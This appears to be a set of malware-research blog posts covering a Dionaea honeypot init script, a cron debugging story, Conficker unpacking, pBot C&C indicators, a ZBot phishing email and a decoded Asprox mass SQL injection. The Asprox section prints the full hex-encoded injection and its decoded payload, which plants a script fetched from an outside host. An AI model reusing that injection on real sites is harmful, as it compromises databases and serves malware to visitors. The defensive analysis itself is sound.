Dionaea: Auto Start Script on Ubuntu

Getting Dionaea to run should be very straightforward for most people. For our Dionaea appliance, one feature we need is to have the Dionaea service start when the OS boots. Below is the script for it (shamelessly ripped off from Nepenthes's script):

#! /bin/sh
### BEGIN INIT INFO
# Provides:          dionaea
# Required-Start:    $network
# Required-Stop:     $network
# Should-Start:
# Should-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Dionaea low-interaction honeypot
### END INIT INFO

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/opt/dionaea/bin/dionaea
NAME=dionaea
GROUP=dionaea
PIDFILE=/opt/dionaea/var/$NAME.pid
CONFIG_FILE="/opt/dionaea/etc/dionaea/dionaea.conf"
# Equivalent manual invocation, kept for reference:
#dionaea -u nobody -g nogroup -r /opt/dionaea/ -w /opt/dionaea -p /opt/dionaea/var/dionaea.pid

test -x $DAEMON || exit 0

set -e

# Daemon options: drop privileges to $NAME:$GROUP, log everything except
# debug, log all domains, use the work directory and config file above.
# The options are written out at the call site rather than in a variable:
# quotes inside a variable are passed to the daemon literally, and an
# unquoted * would be expanded by the shell against the files in the
# current directory.
do_start() {
	start-stop-daemon --start --quiet --oknodo --pidfile $PIDFILE \
	--background --make-pidfile --exec $DAEMON -- \
	-u $NAME -g $GROUP -l all,-debug -L '*' -w /opt/dionaea -c $CONFIG_FILE
}

# SIGTERM (15) lets dionaea shut down cleanly; the pidfile identifies it.
do_stop() {
	start-stop-daemon --stop --quiet --oknodo --pidfile $PIDFILE \
	--signal 15 --exec $DAEMON
}

case "$1" in
  start)
	echo -n "Starting $NAME: "
	do_start
	echo "$NAME."
	;;
  stop)
	echo -n "Stopping $NAME: "
	do_stop
	echo "$NAME."
	;;
  restart|force-reload)
	echo -n "Restarting $NAME: "
	do_stop
	sleep 1
	do_start
	echo "$NAME."
	;;
  *)
	N=/etc/init.d/$NAME
	echo "Usage: $N {start|stop|restart|force-reload}" >&2
	exit 1
	;;
esac

exit 0

Copy the script, name it dionaea and move it to /etc/init.d/.

On Ubuntu, we need to activate the script so that it is linked into the runlevels we want for Dionaea. Let's use the default runlevels:

shell$ sudo update-rc.d dionaea defaults

To start the dionaea service, simply run:

shell$ sudo /etc/init.d/dionaea start

Crontab Problem

There was a problem in one of my bash scripts. The script (master-universe) is the starter of another script. It should run daily at midnight to check whether a child process, the manager of that other script, is still running. If the child process is somehow dead, it (re)executes the child.

theInduk.sh
	(call)  ---  master-universe.sh
		   (call)  ---   child_proses.sh

I tested the script with bash and /bin/sh, and it seemed to work just fine.

kill_master() {
	for pid in `ps aux | grep -v grep | grep 'master-universe' | awk '{print $2}'`; do
		echo "Killing pid: " $pid
		kill -9 $pid
	done
}

The function above is the source of the problem. When executed from crontab, it refused to enter the for loop, as if the master-universe process did not exist (I had checked via ps aux from the CLI that it did).

My first thought was that /bin/sh couldn't interpret the for syntax for whatever reason. But that's not true, because when I ran it from the console

sh ./theInduk.sh

everything seemed all right.

After spending more than an hour debugging and nearly smashing my mouse against the 19" LCD, I realized it! I added a line to the code, and it revealed everything.

kill_master() {
	ps aux > /tmp/napeTakSama.txt
	for pid in `ps aux | grep -v grep | grep 'master-universe' | awk '{print $2}'`; do
		echo "Killing pid: " $pid
		kill -9 $pid
	done
}

Result of /tmp/napeTakSama.txt:

root    809  0.0  0.0  5688   996  v3  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    810  0.0  0.0  5688   996  v4  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    811  0.0  0.0  5688   996  v5  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    812  0.0  0.0  5688   996  v6  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    813  0.0  0.0  5688   996  v7  Is+   2Jul09   0:00.00 /usr/libexec/gett
root  60580  0.0  0.0 20440  1624  p0  I     6Jan10   0:00.00 su
root  60581  0.0  0.1 10104  2712  p0  I+    6Jan10   0:00.02 _su (csh)
xmen 83289  0.0  0.1  9016  2248  p0  Is   21Jul09   0:00.04 /usr/local/bin/ba
root    941  0.0  0.1 10104  3104  p1  Is    2Jul09   0:00.10 /bin/csh
root  61684  0.0  0.1  9456  2980  p1  S+    6Jan10   0:11.10 tcpdump -avvv -i
root    971  0.0  0.1 10104  3084  p2  Is+   2Jul09   0:00.15 /bin/csh
xmen  3960  0.0  0.1  9016  2176  p3  Is    3Jul09   0:00.01 -bash (bash)
xmen  3966  0.0  0.0  8144  1716  p3  S+    3Jul09   0:23.29 screen -l
xmen  3970  0.0  0.1  9016  2176  p4  Is+   3Jul09   0:00.06 /usr/local/bin/ba
xmen  4029  0.0  0.1  9016  2252  p5  Is    3Jul09   0:00.12 /usr/local/bin/ba

Can you see the problem?

Yup.. the output of ps aux above is somehow truncated to 81 characters per line, so my grep cannot find the master-universe string. Run from cron there is no terminal attached, so ps falls back to a fixed default width instead of the console's window size, which is why the same command looked fine when run interactively.

The Solution?
Instead of ps aux I used 'ps ax' and filtered on the first column.

for pid in `ps ax| grep -v grep |grep 'master-universe' |awk '{print $1}'`; do

The above code worked as I expected.

This happened on FreeBSD 7.2. (I hate BSD!) I tried the original code on Linux (Ubuntu Karmic) and guess what? The result was as expected from a well-behaved, innocent OS.

(Note to myself: Remember, always love Linux).
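The same pid lookup, written to be immune to the truncation above. This is an added example in Ruby (my code, not the post's script): it asks ps for only the pid and the full command line (ps axwwo pid=,command=, where ww tells BSD ps never to cut lines to the terminal width; Linux procps accepts the same BSD-style flags), and it matches the script name as a whole path element rather than as a bare substring, so a log path or argument that merely contains the name is not signalled along with the real process. The ps rows in SAMPLE_PS_OUTPUT are constructed, not captured. On either OS, pgrep -f master-universe.sh does the same lookup in one command.

```ruby
# Added example, not code from the post: find the pids of a script by
# name without depending on ps's column layout or on its line width.
# "o pid=,command=" asks for exactly two columns and suppresses the
# header; "ww" tells BSD ps not to truncate to the terminal width
# (Linux procps accepts the same flags in this BSD-style form).
PS_COMMAND = %w[ps axwwo pid=,command=].freeze

# Parse "pid command-line" rows and return the pids whose command line
# names the script (needle) as a whole path element, skipping the tools
# of the searching pipeline itself (the original grep matched its own
# grep process and had to filter it out again).
def pids_matching(ps_output, needle)
  token = %r{(?:\A|[\s/])#{Regexp.escape(needle)}(?:\s|\z)}
  pipeline_tool = %r{\A(?:\S*/)?(?:ps|grep|awk|pgrep)(?:\s|\z)}
  ps_output.each_line.each_with_object([]) do |line, pids|
    pid, command = line.strip.split(/\s+/, 2)
    next if pid.nil? || command.nil?
    next unless command =~ token
    next if command =~ pipeline_tool
    pids << pid.to_i
  end
end

# Run ps and look up a script by name, leaving out this process itself.
def running_pids(needle)
  output = IO.popen(PS_COMMAND, &:read)
  pids_matching(output, needle) - [Process.pid]
end

# Signal every matching process; SIGTERM by default rather than SIGKILL,
# so the script gets a chance to clean up. Returns the pids signalled.
def kill_matching(needle, signal = 'TERM')
  running_pids(needle).each { |pid| Process.kill(signal, pid) }
end

# Constructed sample of ps output (not real captured output) in the
# two-column layout produced by PS_COMMAND. Line 2 is the searching
# pipeline, line 4 contains the name only inside an argument.
SAMPLE_PS_OUTPUT = <<~PS
   1234 /bin/sh /home/xmen/master-universe.sh
   1235 grep master-universe.sh
   1236 /bin/sh /home/xmen/theInduk.sh
   4321 /bin/sh ./child_proses.sh --log=/var/log/master-universe.sh.log
PS

if __FILE__ == $PROGRAM_NAME
  puts pids_matching(SAMPLE_PS_OUTPUT, 'master-universe.sh').inspect
end
```

Called on the constructed rows, pids_matching returns only 1234: the grep row is dropped as part of the pipeline, and the child_proses row is dropped because the name appears inside an argument, not as the script being run.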

OllyScript – Automating detection and unpacking the Conficker Worm Variant B/C

To bring the problem of extracting unpacked code closer to something decidable, MyCERT has been working on automating the unpacking procedure in an assembly-like scripting language. The script, written for OllyScript, can be used to unpack the Win32/Conficker B and Win32/Conficker C worms. OllyScript is a scripting-language plugin for OllyDbg that simulates a user's debugging session inside OllyDbg.

OllyScript matters when dealing with PE packers: unpacking a single protector by hand can take hours, and it is not something users need to do often. The unpacked-code extraction script at [https://blog.honeynet.org.my/mirror/Unpack_ConfickerBC.txt] works by identifying the Conficker variant of the input executable; an automated decompression routine is then run to unpack the obfuscated code.

For instructions on running "Unpack_ConfickerBC.txt" in OllyDbg, please refer to the previous post [https://blog.honeynet.org.my/?p=81].

MyKotakPasir: Solved major problem during automated analysis.

MyKotakPasir 2 is a malware sandbox developed by the Malware Research Center at MyCERT. A lot of improvements have been introduced since the first version. For instance, the previous version used two different programming languages, Python and VB, to handle the analysis work.

Due to some teething problems with Python, I have moved everything to Visual Basic to make it more consistent. This also means that the analysis is done by a single process, which is much more stable and faster *.

Here’s a screenshot.

MyKotakPasir 2 in isolated environment

Major changes made:

+ Removed the Python script.
+ Added anti-termination protection to the MyKotakPasir core engine.
+ All reports and database access are now handled by the core engine.
+ Code optimization saves almost 50% of the time during analysis.
+ Reverting to a clean snapshot is now done by the core engine.
+ Multiple OS platforms running VirtualBox are supported (previously Linux only).
+ Changed the command-line parameters for starting/reverting snapshots to the new Oracle VirtualBox.
+ New web interface.

Other new features will be available in the next update.

MySuntikanAPI

MyCERT has been developing a few analysis tools for reversing. MySuntikanAPI is still in alpha and needs more improvement. Every hooked API captures detailed information to make sure we don't miss any behaviour, especially in malware samples.

API hooking, as used here, is IAT hooking. One of the tools we created is called 'MySuntikanAPI'. It is used to hook and collect API information from a process. Here is a sample result after hooking notepad.exe.

Every hooked API in the targeted process captures its buffer (where there is one) to retrieve information from calls such as GetTempFileName(), CreateFile(), DeleteFileA() and so on. The log file is saved for later analysis. The tool will be integrated into our sandbox as one of its components. It comes in two files: MySuntikanAPI.exe (the injector) and MySuntikanAPI.dll (the DLL to be injected).

Hooking pBot

I'm working on analyzing remote file inclusion (RFI) code. For the pBot class, which uses an IRC server as its command and control (C&C), we are interested in the IP address of the C&C, the channel name and the nickname used to connect to the IRC server.

Below is a sample of the output:

ok!
(host=irc.server_name.net, port=6667, , , 30)
( 1160 , "USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 " ,  )
( 1160 , "NICK [E]inul92112 " ,  )
( 1160 , "MODE [E]inul92112 +ps" ,  )
( 1160 , "JOIN #knk !anime" ,  )
( 1160 , "PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)" ,  )
( 1160 , "PRIVMSG #trouxanime :[vuln!]: http://" ,  )
( 1160 , "NICK [E]inul97869" ,  )
( 1160 , "PONG :1508829909" ,  )
( 1160 , "PONG :1508829909" ,  )
( 1160 , "PONG :1508829909" ,  )
( 1160 , "PONG :1508829909" ,  )
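Pulling the indicators the post is after (C&C server and port, nicknames, channels) out of that hook output. This is an added Ruby example, not part of the original post or of the hooking tool: the log format is assumed from the sample above (a "(host=..., port=...)" line for the connect, then one "( socket , "data" , )" line per send), the IRC commands are read according to their standard syntax (JOIN takes comma-separated channels followed by optional keys, PRIVMSG a target followed by text), and SAMPLE_HOOK_LOG is a constructed copy of the sample with the long uname text shortened.

```ruby
# Added example, not part of the original post: extract C&C indicators
# from MySuntikanAPI-style hook output of a pBot sample.
CONNECT_LINE = /\(host=([^,\s)]+),\s*port=(\d+)/
# "( socket , "data" , )" with straight or typographic double quotes
SEND_LINE    = /\A\(\s*(\d+)\s*,\s*["\u201C](.*?)["\u201D]\s*,/

def extract_indicators(log)
  ind = { servers: [], nicks: [], channels: [], channel_keys: {}, targets: [] }
  log.each_line do |raw|
    line = raw.strip
    if (m = CONNECT_LINE.match(line))
      ind[:servers] << [m[1], m[2].to_i]
      next
    end
    next unless (m = SEND_LINE.match(line))
    command, args = m[2].strip.split(/\s+/, 2)
    next if command.nil?
    args ||= ''
    case command.upcase
    when 'NICK'
      ind[:nicks] << args.strip
    when 'JOIN'
      # JOIN <chan>{,<chan>} [<key>{,<key>}]: keys pair up with channels
      chans, keys = args.split(/\s+/, 2)
      chans = chans.to_s.split(',')
      keys  = keys.to_s.split(',')
      chans.each_with_index do |chan, i|
        ind[:channels] << chan unless ind[:channels].include?(chan)
        ind[:channel_keys][chan] = keys[i] if keys[i]
      end
    when 'PRIVMSG'
      # the target is the channel (or nick) the bot reports back to
      target = args.split(/\s+/, 2).first
      ind[:targets] << target if target && !ind[:targets].include?(target)
    end
  end
  ind
end

# Constructed sample in the shape of the hook output above.
SAMPLE_HOOK_LOG = <<~LOG
  ok!
  (host=irc.server_name.net, port=6667, , , 30)
  ( 1160 , "USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server i686 " ,  )
  ( 1160 , "NICK [E]inul92112 " ,  )
  ( 1160 , "MODE [E]inul92112 +ps" ,  )
  ( 1160 , "JOIN #knk !anime" ,  )
  ( 1160 , "PRIVMSG #trouxanime :[uname!]: Linux phpsBox (safe: off)" ,  )
  ( 1160 , "NICK [E]inul97869" ,  )
  ( 1160 , "PONG :1508829909" ,  )
LOG

if __FILE__ == $PROGRAM_NAME
  p extract_indicators(SAMPLE_HOOK_LOG)
end
```

On the sample this yields the server irc.server_name.net on port 6667, the two nicknames, the channel #knk with its key !anime, and #trouxanime as the channel the bot reports to; the MODE, PONG and USER lines carry no indicator and are skipped.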

Yet another PDF Analyz3r

[A blog post by Ahmad Azizan, practical student @ MyCERT]

To this day, client-side attacks through Adobe Reader vulnerabilities are not slowing down. Even though patches for the known Adobe Reader vulnerabilities have been public for quite a while, there are still a lot of websites hosting malicious PDF files for unsuspecting users.

A malicious PDF file is usually embedded with JavaScript that exploits Adobe Reader vulnerabilities, such as util.printf, Collab.getIcon and Collab.collectEmailInfo. These exploits are crafted to trigger a buffer overflow when the PDF file is opened. Consequently, the payload carried in the JavaScript is executed, allowing malware (e.g. a bot) to be downloaded and installed silently on the user's PC.

Analyzing PDF files is quite a challenging task (to some!) without the right tools and a basic understanding of the PDF component structure, since attackers have hundreds of obfuscation techniques to make their malicious code harder to read. By the time analysis takes place, the embedded JavaScript is usually deflated and encoded into unreadable content, so suitable tools are needed to inflate and decode it for further analysis.

To make my analysis easier, I am currently developing an application to analyze PDF files automatically, called PDF analyz3r. PDF analyz3r is written in Ruby; it automatically inflates the PDF content, interprets the JavaScript code inside the PDF file, and then extracts the payload to determine its behaviour and the potential URL of the malware download. PDF analyz3r currently supports inflation of single or cascaded FlateDecode, ASCIIHexDecode and ASCII85Decode filters.
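What "inflating a single or cascaded filter" involves, as an added Ruby example that is not PDF analyz3r's code: decoders for the three filters named above, plus a reader for the /Filter entry of a stream dictionary so that a cascade is undone in the order the PDF lists it. Filter semantics (whitespace, the '>' and '~>' end-of-data markers, the 'z' shorthand and partial final group of ASCII85) follow the PDF specification. The stream used for the demonstration is constructed in the block: a harmless script line, deflated and then hex-encoded; it is not taken from any malicious sample.

```ruby
require 'zlib'

# Added example, not the code of PDF analyz3r: decoding of the three
# stream filters the post names, applied singly or as a cascade.

# Pull the filter names, in decoding order, out of a stream dictionary.
# Handles both "/Filter /FlateDecode" and "/Filter [/A /B]".
def filters_of(stream_dict)
  m = stream_dict.match(%r{/Filter\s*(\[[^\]]*\]|/\w+)})
  m ? m[1].scan(%r{/(\w+)}).flatten : []
end

# ASCII85Decode: groups of 5 chars '!'..'u' encode 4 bytes (base 85),
# 'z' stands for four zero bytes, a short final group is padded with
# 'u' and yields one byte fewer than its padding, "~>" ends the data.
def ascii85_decode(data)
  body = data.sub(/\A<~/, '').split('~>', 2).first.to_s.gsub(/\s+/, '')
  out = ''.b
  body.scan(/z|[!-u]{1,5}/) do |group|
    if group == 'z'
      out << "\0\0\0\0".b
      next
    end
    pad = 5 - group.length
    value = (group + 'u' * pad).each_char.inject(0) { |acc, c| acc * 85 + (c.ord - 33) }
    out << [value].pack('N')[0, 4 - pad]
  end
  out
end

# ASCIIHexDecode: hex digits with whitespace ignored, '>' ends the data,
# and an odd trailing digit is treated as if followed by 0.
def ascii_hex_decode(data)
  hex = data.split('>', 2).first.to_s.gsub(/\s+/, '')
  hex += '0' if hex.length.odd?
  [hex].pack('H*')
end

def apply_filter(name, data)
  case name
  when 'FlateDecode'    then Zlib::Inflate.inflate(data)
  when 'ASCIIHexDecode' then ascii_hex_decode(data)
  when 'ASCII85Decode'  then ascii85_decode(data)
  else raise ArgumentError, "unsupported filter #{name}"
  end
end

# A /Filter array lists the filters in the order they must be undone, so
# [/ASCIIHexDecode /FlateDecode] means: hex-decode first, then inflate.
def decode_stream(data, filters)
  filters.inject(data) { |buf, name| apply_filter(name, buf) }
end

# Constructed sample (not a real malicious PDF): a script body, deflated
# and then hex-encoded the way a cascaded stream would be stored.
CONSTRUCTED_JS     = "app.alert('constructed sample');"
CONSTRUCTED_DICT   = "<< /Length 1 /Filter [/ASCIIHexDecode /FlateDecode] >>"
CONSTRUCTED_STREAM = Zlib::Deflate.deflate(CONSTRUCTED_JS).unpack('H*').first.upcase + '>'

if __FILE__ == $PROGRAM_NAME
  puts decode_stream(CONSTRUCTED_STREAM, filters_of(CONSTRUCTED_DICT))
end
```

Because decode_stream takes the filter list from the dictionary, the same call handles a single FlateDecode stream and a three-deep cascade alike; an unknown filter name raises instead of silently passing encoded bytes on to the JavaScript stage.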

PDF analyz3r is still under heavy development, but it is already usable: in my tests, 24 out of 29 malicious PDF files were successfully analyzed and detected.

Here are some of the sample analyses (uncompress passwd : analyz3r):

Send me an email if you have a sample to analyze with PDF analyz3r; I would be pleased to give you the output. Until next time, always make sure you are surfing with updated gear. In whatever you do, always try to be safe.

Attention – Mail server upgrade

Attention!

On October 22, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.

The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.

This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.<some-domain>.secure.<some-evil-domain>/ssl/id=7906947-<some-address>-list@<some-domain>-patch263.exe

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

Nice trick! But no thanks! Here are some details of the downloaded binary:

File name: patch.exe

MD5 sum: 0ee4f395dd071f169e95e34454bbf446

ThreatExpert Summary: Threat characteristics of ZBot - a banking trojan that disables firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with the remote access to the compromised system.

I assumed it was a targeted attack, and that the attacker had created subdomains that look like the real servers for each email they sent.. But I was totally wrong..

No matter what subdomain you use (or none at all), and whatever file you request, as long as the file extension is .EXE the server still responds with HTTP/1.1 301 Moved Permanently and redirects you to the binary.

WGET with no subdomain

WGET with random file name

More technical information on the downloaded binary:

  1. VirusTotal
  2. ThreatExpert

Mass SQL Injection And Asprox Bot

Asprox is one of the botnets that implements mass SQL injection to inject references to a malicious *.js script into MSSQL database servers. Normally the Asprox bot searches for any *.asp script vulnerable (to SQL injection, of course) and injects the malicious *.js script and iframe into the database. A typical injection looks like the log below:

GET /page.asp?id=425;d EcLaRe @s VArcHAr(4000);sET @s=cASt(0x4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220 AS vaRcHaR(4000));eXeC (@s);--
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20090728 Firefox/1.5.0 Opera 9.25
Host: www.xxxx.com
Connection: Close

It's a little bit annoying to decode all the hex chars. It's obvious that the SQL injection input is meant to bypass string-based content filtering :). Out of curiosity about this injection, I wrote a little Ruby script to decode it (using the usual trick of converting hex input via the CAST function). Below are the result, sample usage of the code and sample output:

shell>$ruby hex2ascii.rb '4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220'
[+] encoded string : DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

Since this injection uses a double layer of the hex trick, I need to run the code once more on the inner payload:

CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E)
shell>$ ruby hex2ascii.rb 3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
[+] encoded string : <script src=http://www.bannert.ru/ads.js></script>

All the output then needs to be concatenated with the previous string, such as AS vaRcHaR(4000));eXeC (@s);--. So the final SQL statement will look similar to this:

d EcLaRe @s VArcHAr(4000);sET @s=DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(<script src=http://www.bannert.ru/ads.js></script> As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

From the output we know that the attacker is trying to inject <script src=http://www.bannert.ru/ads.js></script> into every text column of the database. Pages served from the compromised database/web server will then carry this script tag and silently fetch ads.js. Unfortunately, ads.js was no longer available when this blog entry was posted.

Below is the simple Ruby code for decoding the hex values. You need to supply the input found inside the CAST function.

#!/usr/bin/ruby
# copy this code and save as hex2ascii.rb
def usage
   puts "[+] usage: ruby hex2ascii input_string"
end

data = ARGV[0]
result = Array.new
if data.nil?
   usage()
else
   # spaces are dropped so a hex string copied from a wrapped log line still decodes
   data = data.delete(" ")
   # every pair of hex digits is one byte
   data.scan(/../).each { |a|
      result << a.hex.chr
   }
   # join the bytes into one string (Array#to_s prints brackets and quotes on Ruby 1.9+)
   puts "[+] encoded string : #{result.join}"
end

Here is how you can use the code:

shell>$ ruby hex2ascii.rb '3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E'
[+] encoded string : <script src=http://www.bannert.ru/ads.js></script>

* Don't forget to wrap the input in single quotes (' ') when typing it in.
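The same hex-to-ASCII step, generalised so the double layering seen above no longer needs a second manual run. This is an added Ruby example, my code rather than the hex2ascii.rb above or anything of MyCERT's: it finds every CAST(0x... AS VARCHAR(n)) in a statement, decodes it in place, and repeats until no hex cast remains, then lists the URLs in the decoded text. The statement in OUTER_SQL is constructed for the example (a made-up UPDATE wrapped in the same DECLARE/SET/EXEC shape as the log); only the script URL comes from the decode above.

```ruby
# Added example, not the post's hex2ascii.rb: decode every hex CAST in a
# statement, repeatedly, so nested layers unwrap without re-running by hand.
HEX_CAST = /cast\s*\(\s*0x([0-9a-f\s]+?)\s+as\s+(?:n?var)?char\s*\(\s*\d+\s*\)\s*\)/i

# Decode hex that may carry the spaces and line breaks of a wrapped log line.
def hex_to_ascii(hex)
  [hex.gsub(/\s+/, '')].pack('H*')
end

# Replace every hex CAST with its decoded text; loop because the decoded
# text can itself contain further hex CASTs. max_rounds guards against
# input that keeps producing new casts. Works on bytes, since a decoded
# payload need not be valid UTF-8.
def decode_hex_casts(sql, max_rounds = 8)
  sql = sql.b
  max_rounds.times do
    decoded = sql.gsub(HEX_CAST) { hex_to_ascii(Regexp.last_match(1)) }
    return decoded if decoded == sql
    sql = decoded
  end
  sql
end

# The indicator worth pulling out of the decoded statement.
def urls_in(sql)
  sql.scan(%r{https?://[^\s'"<>()]+})
end

def hex_of(text)
  text.unpack('H*').first.upcase
end

# Constructed two-layer sample in the shape of the Asprox injection: an
# inner CAST nested inside an outer one. The script URL is the one the
# post decodes; the surrounding statement is made up for the example.
INNER_SQL   = "UPDATE t SET c=c+CAST(0x#{hex_of('<script src=http://www.bannert.ru/ads.js></script>')} AS VARCHAR(51))"
OUTER_SQL   = "DECLARE @s VARCHAR(4000);SET @s=CAST(0x#{hex_of(INNER_SQL)} AS VARCHAR(4000));EXEC(@s);--"
DECODED_SQL = "DECLARE @s VARCHAR(4000);SET @s=UPDATE t SET c=c+<script src=http://www.bannert.ru/ads.js></script>;EXEC(@s);--"

if __FILE__ == $PROGRAM_NAME
  decoded = decode_hex_casts(OUTER_SQL)
  puts decoded
  puts urls_in(decoded).inspect
end
```

The first round replaces the outer CAST with the inner statement, the second round replaces the CAST that surfaced inside it, and the third round finds nothing left and returns; on the log line above the same loop produces the final statement the post assembles by hand.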